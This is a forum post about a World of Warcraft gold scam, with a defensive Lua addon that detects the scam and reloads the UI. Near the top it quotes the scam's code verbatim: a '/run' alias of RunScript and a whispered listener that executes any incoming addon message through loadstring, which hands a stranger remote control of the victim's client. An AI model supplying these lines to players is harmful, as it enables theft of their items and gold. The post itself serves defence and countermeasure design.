There have been some gold scams with social engineering involved, if listening to totally shady strangers to run X script could be counted as that.
Would an addon be able to effectively safeguard against that?
https://www.reddit.com/r/wow/comment...h_a_scam_that/
http://us.battle.net/wow/en/forum/topic/20745644941
Run by the victim
Code:
/run RemoveExtraSpaces = RunScript
Whispered to victim
Code:
local f = CreateFrame("Button") f:RegisterEvent("CHAT_MSG_ADDON") f:SetScript("OnEvent", function(_, _, _, msg) pcall(loadstring(msg)) end) RegisterAddonMessagePrefix("somePrefix")
Addon channel
Code:
SendAddonMessage("somePrefix", RemoveExtraSpaces(print("Hello World")), "WHISPER", GetUnitName("target", true))
I tried thinking of a few possible countermeasures:
- Prehooking AcceptTrade() with additional checks, but Blizzard has it upvalued.
Maybe it could be still useful to prehook it if the script is not something like TradeFrameTradeButton:Click()
- Posthooking RemoveExtraSpaces() and checking if the function reference changed, but had to hook RunScript() and DevTools_DumpCommand() instead
So I'm trying to call ReloadUI() to remove the script asap. Unless the culprit was literally standing next to the player.
But I don't know how to set a secure attribute for key/button presses and right-clicks, so that it would also /reload at the press of any button.
OnKeyDown / OnKeyUp are not able to trigger a hardware event for me.
http://forums.wowace.com/showthread.php?t=20110
Lua Code:
local addonName = ...
local f = CreateFrame("Frame")
local db

local msg = "SafeTrade detected a potential exploit with |cffFFFF00%s|r"
local msg_warn = msg..".\n\nClick anywhere to /reload."
local msg_done = msg.." and /reloaded your UI.\n\nRunning scripts could compromise your character causing the loss of items or gold."

StaticPopupDialogs.SAFETRADE_WARNING = {
    text = "%s",
    button1 = OKAY,
    exclusive = 1, whileDead = 1, showAlert = 1,
}

function f:OnEvent(event, addon)
    if addon == addonName then
        SafeTradeDB = SafeTradeDB or {}
        db = SafeTradeDB -- init savedvars
        if db.warning then
            StaticPopup_Show("SAFETRADE_WARNING", msg_done:format(db.warning))
            db.warning = nil
        end
        self:SetHook("RunScript")
    elseif addon == "Blizzard_DebugTools" then
        self:SetHook("DevTools_DumpCommand")
    end
end

function f:SetHook(func)
    hooksecurefunc(func, function()
        if _G[func] == RemoveExtraSpaces then
            -- reload asap, they can't be that fast ... right?
            db.warning = "RemoveExtraSpaces"
            StaticPopup_Show("SAFETRADE_WARNING", msg_warn:format(db.warning))
            self:CatchHW()
        end
    end)
end

local btn

function f:CatchHW()
    if not btn then
        btn = CreateFrame("Button", nil, nil, "SecureActionButtonTemplate")
        btn:SetAllPoints(UIParent)
        btn:SetAttribute("type", "macro") -- only left-click; how to include right-click?
        btn:SetAttribute("macrotext", "/reload")
        --btn:SetScript("OnKeyDown", ReloadUI) -- does not generate hardware events; any attributes for key presses?
        btn:SetFrameStrata("TOOLTIP")
        btn:SetFrameLevel(1) -- ScriptErrorsFrame/SwatterErrorFrame somehow still is on top (?)
    end
end

f:RegisterEvent("ADDON_LOADED")
f:SetScript("OnEvent", f.OnEvent)
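
The hook in the post compares against one fixed name, RemoveExtraSpaces. As an added example (not part of the original post), the same identity check can be run over every top-level global name instead. `FindAliases`, `SENSITIVE` and the sample tables are hypothetical names built for illustration; in-game the function would be called with `_G` from inside the hook.

```lua
-- Added example: list every global name that references a script-running function.
-- The function names in SENSITIVE come from the post; everything else is constructed.
local SENSITIVE = { "RunScript", "DevTools_DumpCommand", "loadstring" }

-- Returns a sorted list of "alias -> original" strings for top-level entries of
-- `env` that hold the same function value as one of the SENSITIVE names.
local function FindAliases(env)
    local originals, isSensitive = {}, {}
    for _, name in ipairs(SENSITIVE) do
        isSensitive[name] = true
        local fn = rawget(env, name)
        if type(fn) == "function" then
            originals[fn] = name -- function value -> its legitimate name
        end
    end

    local hits = {}
    for key, value in pairs(env) do
        local original = originals[value]
        -- Skip the legitimate names themselves; anything else is an alias.
        if original and type(key) == "string" and not isSensitive[key] then
            hits[#hits + 1] = key .. " -> " .. original
        end
    end
    table.sort(hits)
    return hits
end

-- Constructed stand-ins for the game's global table, so this runs in stock Lua.
local function fakeRunScript(text) end
local clean = { RunScript = fakeRunScript, print = print }
local tampered = {
    RunScript = fakeRunScript,
    RemoveExtraSpaces = fakeRunScript, -- the alias from the scam described above
    print = print,
}

assert(#FindAliases(clean) == 0)
local hits = FindAliases(tampered)
assert(#hits == 1 and hits[1] == "RemoveExtraSpaces -> RunScript")
for _, hit in ipairs(hits) do print("alias found: " .. hit) end
```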